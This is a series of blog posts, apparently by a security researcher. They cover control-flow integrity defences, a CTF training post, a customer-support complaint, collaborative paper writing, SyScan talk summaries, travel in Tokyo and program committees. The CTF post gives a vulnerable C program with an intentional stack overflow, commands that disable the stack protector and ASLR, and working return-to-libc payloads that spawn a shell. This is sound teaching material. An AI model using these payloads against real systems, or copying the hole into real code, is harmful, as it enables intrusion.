Comparing CFI and CPS shows that CPS is stronger for scenario B, protecting the application from attack. For scenario C, CFI may allow a smaller set of targets then CPS, however, CPS makes it harder to make the program use wrong code pointer in the first place. The security comparison between CFI and CPS in this case depends on the program being protected.

Comparing CPS and CPI shows that CPI is stronger than CPS for scenario C.

Comparing CFI and CPI shows that CPI is stronger than CFI in scenarios B and C due to the memory safety guarantees that it provides for all sensitive pointers. CFI enforces a static property that was determined at compile time, whereas CPI enforces actual integrity of all sensitive pointers.

Performance comparison

Comparing performance is hard, especially as most CFI implementations are not open-source. Also, we did not yet have time to evaluate the open-source VTV implementation. As some indication at performance we list the performance numbers as reported in the actual papers. Please be aware that these numbers were measured on different systems under different configurations and serve -- at best -- as an indication of actual performance overhead.

Safe Stack / CPS / CPI:

Property	Average	Median	Maximum	Benchmark	Reported in
Safe stack	0.0%	0.0%	4.1%	C/C++ SPEC2006 CPU	[1]
CPS	1.9%	0.4%	17.2%	C/C++ SPEC2006 CPU	[1]
CPI	8.4%	0.4%	44.2%	C/C++ SPEC2006 CPU	[1]

VTV and IFCC ([4]):

The paper introduces VTV (virtual-table verification) and IFCC (indirect function-call checks). The former protects virtual function calls, ensuring that, at any given call site, only the virtual function that corresponds to a static type of that call site or its subtype might be called. The IFCC restricts indirect function calls to either any valid function, or any function with the same number of arguments as the call site.

Note that neither VTV nor IFCC provide return addresses protection.

[4] reports "1% to 8.4% overhead" for VTV only as evaluated on 7 (out of 19) SPEC2006 CPU benchmarks and Google Chrome. The reported overhead for IFCC only is around 4%.

Finest-grained CFI implementation

The overhead reported by the original CFI implementation [2] is 21% when return address protection is enabled. To our knowledge, one of the strongest CFI implementations around is provided by WIT [5] and has performance overhead of 10% on average. This includes both function pointers and return address protection.

[1]	(1, 2, 3, 4, 5) Code-Pointer Integrity. Volodymyr Kuznetsov, László Szekeres, Mathias Payer, George Candea, R. Sekar, Dawn Song. In OSDI'14

[2]	(1, 2) Control-Flow Integrity. Martin Abadi, Mihai Budiu, Ulfar Erlingsson, Jay Ligatti. In CCS'05

[3]	Out of control: Overcoming control-flow integrity. Enes Göktas, Elias Athanasopoulos, Herbert Bos, Georgios Portokalidis. In Oakland'14

[4]	(1, 2, 3) Enforcing Forward-Edge Control-Flow Integrity in GCC & LLVM. Caroline Tice, Tom Roeder, Peter Collingbourne, Stephen Checkoway, Ulfar Erlingsson, Luis Lozano, Geoff Pike. In Usenix Security'14

[5]	Preventing Memory Error Exploits with WIT. Periklis Akritidis, Cristian Cadar, Costin Raiciu, Manuel Costa, Miguel Castro. In Oakland'08

'sploits or having fun with the heap, stack, and format strings

2014-09-30T12:09:00-04:00

As part of the weekly CTF meetings we discussed some basic stack-based, heap-based, and format string based exploits. For system security challenges these are bread and butter techniques and rely on a huge amount of pre-existing knowledge about operating systems, kernels, process creation, dynamic loading, C programming, stack layouts, and assembly. As it's always hard to convey all the information on the white board during an online session, I thought I'd write a quick blog post to give some additional pointers and examples for the demo exploits.

You might or might not have heard that we are starting a CTF team at Purdue called b01lers. The weekly meetings are open to any Purdue student and therefore draws a very mixed crowd, from undergrads to graduate students, first semester technology and computer science students to crypto and system security experts in the final year of their PhD. This results in a very homogeneous group and makes it challenging to, one one hand, keep the topic interesting for the experienced crowd and, on the other hand, not loose the new folk. To allow the CTF club to target more experienced hackers and to enable a faster bootstrapping sequence, both the ACM SIGSAC and the Forensics club presidents have agreed to help out with the training. They will take over some of the more basic tool training, allowing better and faster progress for all the clubs! Together we can make Purdue better known in the security landscape.

Stack-based vulnerability

The first example we'll discuss is a stack-based vulnerability. Individual stack frames can be super tricky and during the live demonstration I successfully talked myself into a corner and screwed up the demo (well, it kind of worked but I did not explain the layouts correctly). Assume we have the following program:

#include <stdio.h>
#include <stdlib.h>

void myfunc(char *strs[])
{
  char buf[4];
  printf("target (myfunc): last argument is at %p\n", &strs);
  sprintf(buf, "%s", strs[1]);
  printf("we copied '%s' into the buffer\n", buf);
}

int main(int argc, char *argv[])
{
  if(argc < 2) {
    printf("usage: %s data\n", argv[0]); return 0;
  }
  printf("target: SHELL is at %p, system is at %p, exit is at %p\n", getenv("SHELL"), &system, &exit);
  myfunc(argv);
  printf("And we returned safely from our function\n");
  return 0;
}

With some C experience we see that function myfunc is susceptible to a buffer overflow. The first argument is an array of strings and the first string is copied into the local stack buffer (which is super small). Luckily for an attacker, the program has many information leaks and will tell us readily about interesting addresses in memory, e.g., the locations of system() and exit() in the libc and the location of the SHELL environment variable above the stack region.

We compile this example with disabled stack protector:

gcc -O0 -fno-stack-protector -o stackoverflow stackoverflow.c

For the sake of reproducability, let's disable ASLR:

sudo sysctl -w kernel.randomize_va_space=0

And when we execute "./stackoverflow fooo" we see:

target: SHELL is at 0xffffd358, system is at 0x8048480, exit is at 0x8048470
target: last argument is at 0xffffcf40
we copied 'fooo' into the buffer
And we returned safely from our function

Now if the supplied argument (fooo above) is longer then 4 bytes we have a buffer overflow and start overwriting parts of the stack that might be used for other data. Even if we copy a larger string (foo1234) the program does not crash (even though a memory safety violation happens and the buffer overflow is overflown). It gets clearer if we look at the assembly of myfunc using objdump (objdump -d ./stackoverflow|less):

804859d:       55                      push   %ebp
804859e:       89 e5                   mov    %esp,%ebp
80485a0:       83 ec 28                sub    $0x28,%esp
...
80485c2:       8d 45 f4                lea    -0xc(%ebp),%eax
80485c5:       89 04 24                mov    %eax,(%esp)
80485c8:       e8 83 fe ff ff          call   8048450 <strcpy@plt>

In this code sequence we see that the C compiler opens an 0x28 byte stack frame and the buffer buf is allocated at 0xc above the saved ebp of the prior frame. Now if we read the assembly we see that the part of the stack frame that is of interest to us is:

prior frame
saved RIP
saved EBP  <- ebp
4 byte padding
4 byte padding
buf[4]  <- ptr to buf
padding
end of frame  <- esp

So when we write up to 4 bytes everything will be fine. If we write up to 12 bytes we'll have a memory corruption and a memory safety violation but no crash (that's the dangerous area from a software development kind of view as there clearly is a bug but not a crash). If we supply between 12 and 16 bytes then the program will continue but when returning to the caller (main in our example) the stack frame will be adjusted to the new value that the attacker supplied (usually ending in a crash).

Now if we want to exploit this buffer overflow we'll have to redirect the control flow to a function in libc that we can control. For this case, we use the handy system() function that executes a shell command for us.

We execute:

PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print "A"x16;'`

In this example we set a couple of things: first we set two environment variables (PS1 which controls how the prompt looks like and SHELL where we define what command will be executed). As we're overwriting EBP with all 'A's it will obviously crash, but we can note the locations of system, exit, and SHELL for later (in my case the values are 0x8048480 for system, 0x8048470 for exit, and 0xffffd29c for SHELL but your values might differ).

Now, let's examine the crash in a debugger:

gdb --args ./stackoverflow `perl -e 'print "A"x16;'`

If we execute the program using 'run' or 'r' we get a SIGILL due to the messed up stack frame when we return. Using 'bt' we can display the remaining stack frames and with 'frame 0' and 'info frame' we can display data on frames. If we instead execute a longer array (x20 instead of x16 above) we see that the program crashes in 0x41414141:

we copied 'AAAAAAAAAAAAAAAAAAAA' into the buffer

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Looking at the stack frames using 'bt' tells us that it's all messed up. But 0x41 is 'A' in the ASCII table which tells us that we have some control over the return instruction pointer. We can peek around further and set some break points at interesting locations and I invite you to play around ('disas myfunc' displays the assembly of myfunc, 'break *address' stops the execution at address and let's you inspect the program state, 'c' continues, 'si' continues execution one instruction at a time).

Now if we use the information we learned above and set the return instruction pointer to system() we can supply a parameter:

PS1='\$ ' SHELL=/bin/sh ./stackoverflow `perl -e 'print "A"x16 . "\x80\x84\x04\x08" . "\xf3\xc0\xfe\xc0" . "\x9c\xd2\xff\xff";'`

Here we configure the stack as follows:

prior frame            // now saved argument to system, points to SHELL
prior frame            // now saved new ebp, 0xc0f3c0f3 in the example above
saved RIP              // now points to system()
saved EBP  <- ebp      // AAAA
4 byte padding         // AAAA
4 byte padding         // AAAA
buf[4]  <- ptr to buf  // AAAA
padding
end of frame  <- esp

Now if we return from myfunc we no longer end up in main but it looks like a legit call to system() with &SHELL as a parameter. If we execute the command above we're dropped into a shell but if we exit that shell the original program will segfault. If we want a clean exit we can prepare a second stack frame where 0xc0fec0f3 is used as a second invocation frame, executing a clean exit:

PS1='\$ ' SHELL=/bin/sh ./stack_based_overflow `perl -e 'print "A"x16 . "\x80\x84\x04\x08" . "\x70\x84\x04\x08" . "\x9c\xd2\xff\xff";'`

The interested reader may use execl instead of system to ensure that we don't loose SUID privileges. Some articles that you might find interesting to follow up are:

Jumping monkeys or how to reach a technical point of contact at an online or tech company

2014-08-27T10:09:00-04:00

Do you know this situation where you have some domain specific knowledge about a problem but first level support at a company blocks you from getting to a knowledgeable person? An example would be tech support at an internet company where you have already restarted your modem and computer yet first level support insists on you restarting the modem yet again.

Online companies and tech companies often either have no support at all or only provide first level non-technical customer support. Google is a good example, even if you are a customer there's now way for you to reach a technical person if you run into a bug or problem with your installation. There are many reasons for companies to follow such a procedure, mostly to reduce unnecessary down time of engineers with non-technical user problems. Yet, sometimes a problem that is reported from the outside should be escalated but isn't.

I recently ran into a similar problem and am now asking myself how I can make my voice heard as someone who does not work at that company.

So, I've been using Expedia.com for a while to book hotels and considered making them my primary booking engine for hotels. Recently, they updated their homepage and rewards system so that you get 25$ coupons off future bookings which is a nice idea. Unfortunately, I cannot access the rewards page ( http://expedia.com/user/rewards ). If I'm logged in I get the following error message: "An Internal Error has occurred" as shown in the following picture:

The first time a I came upon the error (early July) I disabled my Firefox AdBlocker and found the same error. I then opened an incognito window and tried again, same error. I figured I'd be a nice guy and sent customer support an email, telling them that they had an error on their homepage. I got a reply from their support roughly 1 day later that told me that they are working on the page and it'll work soon again.

Three weeks later (and a couple of hotel bookings later) I tried to access the rewards page again with the same error. This time I got a little suspicious about what was going on and tested the page both on Chrome and Firefox (on Ubuntu 14.04) both with and without AdBlock, same result in all 4 cases. I sent customer support another email:

Hi there,

since several weeks (at least 3) I consistently cannot access the rewards page on expedia ( https://www.expedia.com/user/rewards ). Every time I access the site with my account Firefox reports "An Internal Error has occurred". Is my account broken or are you still upgrading?

Thanks, Mathias

I got a standard reply that they are upgrading and that they are sorry for my inconvenience. I figured that they assumed I was just another monkey customer who misconfigured his computer, so I replied with more explicit information:

Hi there,

I don't know if I made my point clear: I cannot access https://www.expedia.com/user/rewards

I've been trying to browse to that page using two different browsers (Firefox and Chrome) repeatedly over the span of 3 weeks. Every time I access the page an "Internal error" from your web server is returned!

The problem appears to be on your side and persists for several weeks now. I can access the rest of the expedia page without problems.

Please escalate this problem to web development as there appears to be a bug somewhere in your programming.

Thanks, Mathias

Again, I got the same reply from 1st level support with an apology for my inconvenience but no further help. So I waited for roughly one month (travelling in Europe and setting up camp at Purdue) and tried again. Still the same error. This time I reproduced the error on two desktops, both running Ubuntu 14.04.1, one a fresh installation, both on Firefox and Chromium (the open-source version of Google Chrome). I also verified the bug using Windows 7 and IE7 (using an old VM I had lying around). Every single time I hit the same bug when browsing to the rewards page. I assume that there's some bug in their web logic that is triggered by some weird configuration error in my profile. I wanted to be nice again and sent another email to their support:

Hi there,

you're rewards page is broken for some customers! This is the 3rd time I'm contacting you regarding this issue; the first two times (roughly 1 month ago) I got an answer from 1st level customer support that you are upgrading your website. I've waited for a while and the rewards page ( https://www.expedia.com/user/rewards ) still results in an "Internal Server Error" for me. I've tried to access the page using two different browsers (Chrome and Firefox) under Ubuntu and two browsers (Firefox and IE) under Windows7 always with the same result.

I assume that it has something to do with my account or a broken upgrade/misconfiguration in the database for my user name.

I need you to forward this message to the development team or 2nd level support so that they can FIX the problem! Something is broken on YOUR side and I'm getting seriously annoyed. I'm being nice by telling you about a bug on YOUR site. It is highly likely that other customers are affected as well!

Best, Mathias

This resulted in a very quick reply (<20min) with the following answer:

... We do understand your concerns and should you wish to get in touch with a supervisor then we would need to have you on the line and kindly provide the information to expedite the process. ...

I got stonewalled. I tried to reply two more times but got the same answer. Now the super frustrating thing is: I know that their web page contains a bug but there is no way for me to reach their development team or escalate the question to the development team.

I bet I'm not the only one with this problem. To evade such problems with services like email, calendar, or rss reader (e.g., formerly offered by Google) I just run my own cloud on my own server where I have complete control over all data. But you cannot do this for travel reservations and there are way too many online-only companies that have no (technical) point of contact (Amazon, or any other shipping company comes to mind as well).

Are there any best practices or suggestions on how to reach competent persons for such tech companies? Would it help to drop titles? I wanted to be nice and help Expedia but when they stonewall their customers (when it's their fault and a bug on their side) there's not much you can do than switch to a different company. Please share your thoughts and drop me a note via email or twitter.

On collaborative (remote) paper writing

2014-05-04T19:09:00-04:00

Writing scientific conference or journal papers is an art by itself. This article is not about writing great papers as there already are many good articles that focus on paper writing itself and cover technical aspects, structural aspects, or writing style aspects. In this article I want to give an overview of collaborative writing and some experiences I had during the last couple of scientific paper submissions.

Simple collaborative writing starts in a sequential mode where always one party is writing and another party gives feedback or carries out slight changes to the paper. This simple model fits the adviser and grad student model fairly well, where the grad student produces individual drafts of a paper and the adviser gives feedback on each draft. The draft can start off with a vague description of the actual research project and many research questions might only be answered along the way, yet the model is very simple and also easy to coordinate: either push based, where the adviser explicitly asks for feedback or pull based, where the adviser periodically pulls for progress from the student.

But as soon as either (i) more people join the project, (ii) not all team members are at the same physical location (i.e., all hands on meetings are no longer possible or easily possible), or (iii) the collaboration becomes more interactive it gets more complicated. Some of the questions that arise are:

* How can we write concurrently on different sections?
* How can we coordinate a common goal or structural changes?
* How do we stay focuesed and on track?

In my (limited and still very short) experience it makes sense to group the collaborative writing process into three phases: (i) the brainstorming and research phase when the project is still very volatile, (ii) the distributed paper writing phase where the key points are shaped, and (iii) the freeze phase where individual sections are finished and closed off before the final submission.

Brainstorming and research phase

During this phase the project is still fresh and very volatile: not all research questions have to be fully defined yet. A shared document (a wiki page or a shared Google document) is crucial to fast track this process as it offers a convenient way to write down notes and a rough design section of the project. An additional section can cover related work and key differences between the current project and all other related projects. At this point in time it does not make sense to write abstract, introduction, conclusion yet, as the direction of the project might still change.

As time progresses, the first results of the evaluation can be added into their own section. This is also a great time to do weekly (or bi-weekly) status meetings, either via phone call, skype/hangout, or email. This phase progresses until a couple of weeks before the submission deadline and the results in the evaluation should improve continuously.

Distributed paper writing phase

The "hot" paper writing phase starts a couple of weeks (at least 2, ideally 3-5) before the paper deadline. The existing text is moved from the wiki page (or Google document) into a source repository and formatted according to the submission guidelines of the conference (or journal).

To produce a great final paper I propose a weekly build cycle but you can obviously adjust the time for each sub task to your needs. Each cycle consists of the following sub tasks: (i) 4 days of concurrent modifications with (sub-)section-level locks, (ii) 1 day reading pass, and (iii) asking for external feedback.

Concurrent modification

During this task all team members collaborate on the paper and update individual sections of the paper concurrently. The paper and all files are already in a source revision system. Most of these systems like git or svn handle partial concurrent textual changes and simple conflicts even in monolithic files fairly well (e.g., person A changes the first section while person B changes the second section concurrently). The discussion of using a single monolithic file versus per section files is almost religious (just like vim versus emacs) but I like monolithic files due to, e.g., the simplicity of moving text around, and the ease of global string replacement.

But as soon as two persons change the same section concurrently it becomes very hard to resolve conflicts. To reduce the risk of conflicts it helps if we use explicit locks (i.e., only the person that currently holds the lock for a specific section is allowed to edit and change that section). Depending on the size of the team different lock strategies are possible. For small teams it can be advantageous to send explicit emails to all team members, thereby pushing explicit lock information. If the teams are larger then the amount of emails explodes and it becomes confusing who currently holds which locks. The wiki page (or Google document) from the first phase comes to the rescue again: the shared document can be used to keep track (on a per section basis) who holds which locks and if all team members acquire/release their locks as they work on their sections the risk for conflicts is eliminated. The shared document also allows queues on who requires the lock when it is released, depending on the protocol the releasing team member can send a direct push email to the person that continues on that section.

Bookkeeping and full passes

Every couple of days it makes sense to temporarily freeze all sections to allow a synchronized reading pass. Team members concurrently read the paper from beginning to end. In this pass there are only two kinds of changes allowed: (i) typos, phrasing, and wording and (ii) adding todo notes to individual sections that are then handled by the team member who is responsible for this section in the next concurrent modification pass.

After the reading passes each team member commits a list of remaining task to the shared document and lists open questions that are discussed during the next meeting.

External reviews

At the end of each bookkeeping pass it makes sense to generate a draft and send it to (i) advisers or more remote team members so that they can give feedback on the progress as well, (ii) friends who never read the paper to get valuable first-hand comments, and, as soon as the paper is mature enough, (iii) send it to external reviewers that can give detailed and harsh feedback.

Depending on the amount of passes you can do (i.e., how many weeks you have left until the deadline) you can stretch out your friends and send different papers to different sets of friends, but remember that you should not overburden your colleagues as they might work towards the same deadline (and always return the favor of reviewing papers for them as well) and that each person can only read a paper for the first time once (this step is very important as a potential reviewer will read the paper as a first time reader without any prior knowledge about the idea, design, or other background information).

The feedback from this task is then applied concurrently during the next concurrent writing phase. Individual reviews will dribble in asynchronously and can be discussed on demand.

Freeze phase

One to two days before the deadline the lead author should start to freeze sections by marking sections as frozen in the shared locking document. A frozen section indicates that only the lead author may change any text in this section and only after a second person has reviewed this change.

The last hours before the deadline are always very stressful and human mistakes tend to pile up. Freezing sections and requiring a two person review reduces the risk of human errors and makes the submission process smoother. Also remember to submit individual versions of the paper after every couple of changes, best start submitting the first versions when you start freezing sections.

Conclusion

Writing papers is fun and writing in a big collaboration that is remote can be fun too! Collaboration and team work always includes additional challenges but if you prepare well and are willing to adhere to a strict regimen: (i) synchronization is crucial and you should know what the other team members are doing, (ii) lock pages only work if people actually keep track of the logs, and (iii) you must keep track of the schedule to send out the drafts for external reviews. So enjoy your next collaborative research project!

SyScan, day 2

2014-04-04T21:56:00-04:00

Breaking Anti-Virus Software: Joxean Koret

Joxean gave a great introduction into worst security practices at anti virus companies. He basically dropped a large amount of 0days on a bunch of AV engines (I liked his opening statement "all bugs are 0days unless otherwise mentioned"). Using dumb fuzzing Joxean found a huge amount of crashes and then started diving into the individual engines. He wrote a quick fuzzer himself that runs on Linux and he runs the scanners either under wine or extracts the core engine and runs that one directly. Some of the worst practices he found are that many engines (i) disable ASLR for their core libraries, (ii) inject (unsafe) libraries into all processes, (iii) the scan engine often runs as root with full privileges, and (iv) is full of bugs. So you might want consider trusting your AV engines to handle untrusted files.

Embracing the New Threat: Towards Automatically Self-Diversifying Malware: Mathias Payer

The talk by yours truly. I talked about fully automatic malware diversification. Using a modified compiler we modify the generated code and static data on a per-binary basis. White-paper, slides, and code are released on github.

How to Train Your SnapDragon: Exploring Power Regulation Frameworks on Android: Josh 'm0nk' Thomas

m0nk introduced a set of nice concepts on how to attack different sets of phones by tinkering with power regulation and batteries. Unfortunately, I missed most of the talk, will watch it later when it's online!

Click and Dragger: Denial and Deception on Android: the grugq

Rockstar on the stage, ranting about phone security: mobile phones suck for anonymity, privacy, and security. Smartphones suck even more. Location information (e.g., through triangulation) allows building social graphs, clustering, deanonymization of secondary phones if they correlate with other phones. Networks are just as bad: you can be identified by the numbers you call or the calls you receive, or the calling pattern as well. Smartphones add content, GPS sensors, apps, network connectivity, and so on the mix.

To be safe get burner phones. Buy phone and SIM apart from each other long ago, use infrequently, never at home, and throw away after use. Smartphones are inherently unsafe. You cannot make Android safer by installing apps (e.g., TextSecure).

The grugq presents a new Android mod, based on CyanogenMod and removes all Google code. Added a set of tripwires and default return values that ensure privacy. Lots of userland hardening as well, e.g., adding grsecurity patches, save allocators, and so on. As an add on he presents DarkMatter, a secure app that allows dynamic per-application TrueCrypt volumes (using crypted containers) and transparent access to that data.

(this was the most awesome talk so far - except mine of course)

Navigating a sea of Pwn?: Windows Phone 8 AppSec: Alex Plaskett and Nick Walker

The talk is about Windows mobile phone hacking and as expected, Windows mobile is full of pwn. Great talk about general Windows phone pen testing.

All about the ALPC, RPC, LPC, LRPC in your PC: Alex Ionescu

All the dirty details of different forms of remote or local procedure calls on Windows using different transport services.

Thunderbolts and Lightning: Very Very Frightening: Snare and Rzn

Tunderbolt is a display port and PCIe bundled together. Same DMA attacks as over FireWire a couple of years ago should be possible. The implement the PCIe interface on an FPGA to capture data that is in flight on the cable. The run DMA over PCIe and patch login password check to always return true. Nice!

Linux Memory Forensics: A Real-Life Case Study: Georg Wicherski

Georg started off with a long introduction into APT, attacks, and a discussion of the ELF format. Dumping an executable from memory is no easy task as not the whole binary is loaded into memory and a lot of the section view is lost when individual segments are loaded. In the end Georg wrote some volatility plugin that looks for PLT and GOT.PLT sections and compares the entries of the individual libraries with possible injected ones.

WhiskeyCon

Speakers have to drink two shots of Whiskey to get 5 minutes of talking time. Nguyen Anh Quynh presented his Capstone engine, a multi-platform, multi-ISA disassembly engine. Mark talkes about weirdness on the internet, misconfigured DNS entries, UPnP, telnet, serial port, and much more. Scan all the IPv4 all the time and add a time component to it. The results are online. Rex against the romans was about abuse of power and attacking Macs (i.e., what kind of malware is running there and how to the droppers work). Miaubiz talked a bit longer about lldb and different hooks. metl ranted about IT risk management and liability assessment. Joey was just there for the shots. Yevgeniy talked about abusing malware protections.

SyScan, day 1

2014-04-03T21:56:00-04:00

Opening speech: Thomas Lim

Thomas gave a great introduction, the conference is as big as ever and attracted a whole bunch of different people. BlackHat Asia is going to stay in Singapore, so there will be some challenges in the future. Most speakers on the other hand preferred to drop their 0days at SyScan instead of BH.

Car Hacking for Poories: Charlie Miller and Chris Valasek

Charlie and Chris talked about their great car hacking research for cheap. They basically bought a bunch of ECU off ebay and started wiring them together, ending with a fully functional car without the car parts (i.e., just the electronics). One of the nicer attack vectors is to own one of these ECUs and start sending CAN bus messages around to, e.g., stop the car, accelerate, turn the steering wheel and so on.

Setup for Failure: Defeating SecureBoot: Corey Kallenberg

Corey talked about new ways to baypass UEFI secure boot by temporarily surpressing SMM. He had a bunch of different exploits that allowed to disable the write-protected flash and upload your own rootkit early in the startup process. Many of the BIOSes that are currently in use are broken and most of them can easily be compromised.

Mission mPOSsible: Nils and Jon Butler

Compared to magnetic stripe devices like the ones Square offeres there are also more sophisticated point-of-sale devices that look at chip and pin and are supposed to be secure. Nils and Jon bought a couple of mobile point of sale devices and found that they had (i) usb serial connectors and (ii) were vulnerable to a bunch of command injection vulnerabilities. Pwned.

Scientific Best Practices for Recurrent Problems in Computer Security R&D: Daniel Bilar

Daniel talked about a large set of talks we should have watched in the last 1-2 years. He presented research highlights of hacker talks and how those hacking results were adopted in academia. Adhere to best practices and follow good statistics and methodologies when developing your research.

Deep-Submicron Backdoor: Alfredo Ortega

Let's add a backdoor into the VLSI code of a chip. How would such a backdoor look like and what kind of capabilities could we add? Add a small malicious state machine between the CPU and the memory bus to provide peek/poke functionality, this let's you implement a debugger. The whole debugger can be implemented in a few lines of VLSI code. The talk included an awesome 3D flight through the individual layers of the rendered chip. His second backdoor uses long pins to emit radio frequency to send data from the chip to a receiver outside (basically implementing a neat covert channel). Alfredo included a nice demo that showed how he can exfiltrate keypress data from a running chip.

RFIDler: Adam Laurie

A project inspired by software defined radio that brings software to RFID. The idea is to have software defined RFID tools that allow hacking, tinkering, and fooling around. Existing tools like Proxmark3 are too complicated and too expensive. FUNcube receiver is a great, cheap SDR that one can use to play around. Development time: 1 hours from seeing a new kind of tag to walking into the building. RFID should not be used for access control!

BarCon

After all the main talks were over we headed over to Brewerks to BarCon where we listened to some more talks while we had some beers (and later food and more beers).

Expr'ssing Your Heart's True Desire with LLDB Expressions: Miaubiz

Miaubiz talked about different LLDB hacks he did to enable a smoother debugging experience on iOS. Big audio problems stopped this talk from being awesome.

Getting User Credentials is not only Admin's Privilege: Anton Sapozhnikow

Anton talked about alternative ways to get access to user credentials (usernames and passwords) using an indirect loop through the webbrowser. Nice attack.

From New Zealand with Fail: Dean Carter and Shahn Harris

Great talk about all the infosec fails that happened in New Zealand in the last couple of years, lots of laughs and fun!

Two crazy days in Tokyo

2014-03-29T17:54:00-04:00

After a couple of rough months interviewing for academic positions (there's another blog post coming up on this topic, so stay tuned) I headed off for some well deserved vacation time (and with vacation I mean a hacker conference, SyScan 2014 in Singapore). As there are no direct flights from San Francisco to Singapore I had to have a layover either in Hong Kong or in Tokyo. I haven't visited either place and Tokyo sounded like much more fun to visit, so I planned a two day layover in this weird, crazy city.

Early on Wednesday I packed my stuff (10 minutes is enough time to pack for two weeks) and headed to the BART and to the airport. I quickly enjoyed the lounge at SFO (well, it's an US lounge so you only get crackers, cheese, and some fruits) and off we went. I was pleasantly surprised by the international United flight - they had a professional team on board and the service was really good: plenty of food (2 meals, and ice cream inbetween), lots to drink, and a generally nice atmosphere. I was actually able to work most of the time and relaxed with some movies inbetween.

Immigration to Tokyo was pleasant. I waited for 5-10 minutes, the border officer did not ask any questions and I got my tourist visa. From Narita airport it takes about 1 1/2 hours to reach the main city and I headed straight to the hotel. When I was looking for the hotel I had my first revelation that nobody speaks English. All the signs are Japanese only and if you don't know what the hotel will look like you have no way of finding it. Luckily, I vaguely remembered the front of the hotel as they showed a picture on the booking.com website (that I booked more than a month ago). The nice lady at the reception did not speak English either but with we were able to communicate with hand gestures. I was told to get the real Japanese experience I have to stay in a capsule hotel and that's exactly what I did. The hotel was almost like a hostel with shared bathrooms (including a hot tub!) and toilets but everybody got his (these hotels are men only) own capsule with a little curtain. These things are actually quite large, roughly the same size as a bunk bed but you get "some" privacy. This hotel also allowed me to experience Japanese night time rituals. Men bath together and in Japan they don't have standing showers but sit on a little box and fill a bucket with water that they then pour over themselves. After washing yourself you head to the tub and relax for a bit. After the bath you hop into a night dress that consists of large shorts and a weird shirt. They actually had to give me an extra extra large one (sorry, no pictures).

The next morning I got up early (thanks to the jetlag) and went to the Tsukiji fish market, walked along the merchants and saw lots of tasty fish. After this mouth watering experience I stopped at a local restaurant and ate fresh tuna on rice. Again, the owner did not speak English so I had to kind of show him what I wanted. I think that the Japanese don't really know breakfast as we do and just eat a regular meal for breakfast. I must say it was very tasty!

After this great breakfast I headed out to Akhiabara, the electrical city. According to the guide this is the place where Tokyo got the "weird" attribute and I must say they sell a lot of crazy stuff there. It was interesting to see the different electronics shops and if I would have needed any new gadgets I would for sure have found them there!

I walked through the district and northwards to the Ueno park area, through a nice little market that sold other crazy stuff. This place also had a lot of casinos where a lot of people were gambling. I watched the different games for 10-15 minutes but did not understand if they were pure luck based or if there was some skill involved. The interesting part was that these machines spit out little metal balls that they collected in large plastic containers. The gamblers were all smoking like crazy and some of them had 10-20 boxes full of these balls stacked behind them. That was one of the weirdest experiences but I did not dare take a picture (privacy, you know).

After reaching the park I saw that the cherry trees were in full bloom and snapped a couple of nice pictures. I also experienced another Japanese ritual. Some people reserve tarps under the cherry trees and one guy waits (for hours) for all the others to show up. Then they eat together under the trees and party.

In the afternoon I explored the Tokyo national history museum. The museum was not too exciting but they had lots of old stuff with almost no English signs, so this was a bit of a bummer. I looked at all the stuff but without explanations it's only half the fun.

On my second day I visited the Imperial Palace. Basically it's a large garden with some old structures, mostly guard houses. It was interesting to see the architecture and to stroll around.

One of the fancy things in Tokyo are the hydration stations (hat tip to Alessandro for naming them). Basically at every street corner and inbetween you have these vending machines that sell hot and cold drinks for roughly a buck a pop. Of course I had to try a couple but most of them were quite weird.

After exploring the palace I already had to head back to the airport. The Japanese public transport system runs fairly well and after you had some time to adjust to the signs it is quite reasonable to follow. The hardest part is that there are three different companies that run different lines and it is not always easy to transfer. Back at the airport I quickly checked in and headed to the lounge (as a privileged traveller I get free food) and had a nice meal.

Thanks Tokyo, you treated me well. You were crazy but not as crazy as I expected. I had lots of fun, saw some interesting cultural rituals, some temples and got a good overview of this city.

Surviving your first non-virtual program committee meeting

2014-01-23T00:00:00-05:00

Program committee (PC) meetings are a strange thing. As a graduate student you will surely have experienced the outcome from PC meetings: a message telling you your paper got accepted or the dreaded message that it got rejected and you'll have to send it to another conference.

But how does the review process itself work? During my time as graduate student and my time as a post doctoral scholar I've had my fair share of rejects and a good share of accepts and I have always wondered how the decisions were carried out in the background. I got my first experiences into the process as an external reviewer for my adviser where I had to sum up papers and their contributions for a set of conferences. Later in my studies, I got invited to review some articles for journals where I have apparently become an expert.

Only when I started my postdoctoral studies I got invited to my first PCs, starting with a systems conference (ACM SYSTOR'13 - thanks Mary and Dilma) and a workshop (ACM PPREW'14 - thanks Todd). Unfortunately, the PC meetings for both these conferences were only virtual, meaning that there was no real-world meeting where all the papers were discussed but we used an online forum to discuss which papers got accepted and which ones rejected. Earlier this week I finally went to my first real-world PC meeting at IBM Watson in NY to discuss the program for the upcoming ACM VEE'14 conference (thanks Dilma and Dan for thinking of me).

For all these conferences the review process is surprisingly similar: first, shortly after the submission deadline the reviewers read through all the paper titles and abstract and bet for papers they want to review. I tend to group papers into 4 sets, namely I want to review this paper, I could review this paper, I don't care, and I don't want to review this paper. The system then clusters all bets and suggests a selection of papers for each reviewer that the program chairs can manually optimize. Second, the actual review phase lasts between just a couple of days for small workshops to several weeks. In this phase, the reviewers actually review the papers, write their reviews, adjust their scores over all their papers, and submit the reviews into the submission system. This process usually lasts until a couple of days before the PC meeting. After submitting their reviews, the reviewers usually have access to the reviews of the other reviewers. Third, sometimes there is a rebuttal phase where the authors get access to the latest version of the reviews and get a chance to defend their work from the usually anonymous reviewers. The fourth step is the actual PC meeting.

In the meeting the merit of all submitted papers is discussed. In my first PC meeting the chairs ordered the submissions into 3 groups: early accept (papers with only positive reviews), early reject (papers with only negative reviews), and remaining papers. We voted to follow these suggestions and accept the positively reviewed papers and reject the negatively reviewed papers. All remaining papers were discussed in detail. For each paper we had a discussion lead that summarized the paper in 3-4 minutes, mentioning strengths and weaknesses as identified by the individual reviewers. In the open discussion that followed, the actual reviewers weighed in their opinions first and later all PC members were allowed to join the discussion. I enjoyed the open atmosphere and we had some great technical discussions over some of the papers. It was also really interesting to see the nuances how different reviewers judge the scientific contributions of a paper.

So as not to embarrass myself I prepared well, I finished my reviews early (I knew that I would get busy with the reviews for ASIACCS'14 in due time), wrote up detailed reviews for each paper, read the reviews of the other PC members, and followed the rebuttals that were added to the papers I reviewed. Before the actual meeting I reread my reviews to page the discussion back into my mind and prepared a quick summary for the papers were I was the discussion lead.

